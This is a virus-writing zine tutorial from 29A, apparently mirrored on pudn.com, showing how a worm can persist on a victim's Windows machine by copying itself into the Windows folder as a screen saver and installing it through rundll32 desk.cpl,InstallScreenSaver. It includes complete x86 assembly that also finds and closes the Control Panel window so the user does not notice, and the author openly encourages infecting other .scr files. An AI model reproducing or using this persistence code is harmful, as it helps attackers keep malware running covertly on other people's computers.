www.pudn.com > 29a_fu.zip > 29A-7.030
_______________________________________________________________________
New way to startup files - ShellExecute InstallScreenSaver API
By: SWaNk
ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
____________
Introduction
ŻŻŻŻŻŻŻŻŻŻŻŻ
Lo ppl, this is my first tutorial for 29a. First of all, fogive my
terrible english i'm brazilian.
In this article I'll explain how to install one screen saver
in the victim computer. Why? Just because it can be used to startup
worms/virii with out using the most common ways like "run" or "RunOnce".
unchanging registry or ini flies.
__________
Explaining
ŻŻŻŻŻŻŻŻŻŻ
A few days ago, I was walking inside my registry and i've found
something that call my attention.
[HKEY_CLASSES_ROOT\scrfile\shell\install\command]
@="C:\\WINDOWS\\rundll32.exe desk.cpl,InstallScreenSaver %l"
Well, i start to think.. rundll32.. scrfile.. InstallScreenSaver..
it should be used on ShellExecute API call!
Now it's easy, just follow the steps:
- Find the windows root
- Create one .SCR file at windows root (it's just the basics, you can
make it more interesting infecting all the .SCR files and choosing
one at windows root to install randomly)
- Call the API
With this, if the screen saver run the worm will run too. If the
user open the screen saver tab to change and click on the preview button
it will run again.. think about the possibilities. Now it's with your
sick mind..
PS: We have one small problem. When the worm call the API, it will open
the screen saver window from Control Panel.
You can leave it and let the user close the window or can use 2 APIs
to close the fucking delator. See the sample source code above for
details:
;______________________________________________________________________
; example Source code
;ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
.386p
.model FLAT
extrn ExitProcess : PROC
extrn ShellExecuteA : PROC
extrn SetCurrentDirectoryA : PROC
extrn GetWindowsDirectoryA : PROC
extrn lstrcatA : PROC
extrn MessageBoxA : PROC
extrn CopyFileA : PROC
extrn GetModuleFileNameA : PROC
extrn PostMessageA : PROC
extrn FindWindowA : PROC
.data
PropVideo db 'Propriedades de Vídeo',0 ;window title in portuguese
Message db "running again..",0
open db "open",0
rundll32 db "rundll32.exe",0
InstallSS db "desk.cpl,InstallScreenSaver ",0
SSaver db "SWaNk.scr",0
.data?
MainDir db 256 dup(?)
WindowsDir db 256 dup(?)
.code
start:
push 256
push offset MainDir
push 0
call GetModuleFileNameA ;put the current directory in MainDir
push 256
push offset WindowsDir
call GetWindowsDirectoryA
mov byte ptr [WindowsDir+eax], '\' ;put windows root in WindowsDir+\
push offset SSaver
push offset WindowsDir
call lstrcatA ;WindowsDir+SSaver
push 1
push offset WindowsDir
push offset MainDir
call CopyFileA ;copy the worm to windows root
push offset WindowsDir
push offset InstallSS
call lstrcatA ;InstallSS+WindowsDir
push 1
push 0
push offset InstallSS
push offset rundll32
push offset open
push 0
call ShellExecuteA ; install the worm as screen saver
search:
mov eax, offset PropVideo ;window title change to your language
push eax
cdq ;EDX=0
push edx ;window class - NULL
call FindWindowA
xchg eax, ecx ;swap EAX with ECX
jecxz search ;if ECX=0, don´t find then search again
push edx
push edx
push 12h
push ecx
call PostMessageA ;send message to close the window. Tnx Benny!
push 0
push offset Message
push offset Message
push 0
call MessageBoxA ;Just one message..
push 0
call ExitProcess ;piss off!
end start
;______________________________________________________________________
; -eof-
;ŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻŻ
Well, thats all! I hope this article help you. cya!
"Quem refresca cu de pato é lagoa.." (SWaNk)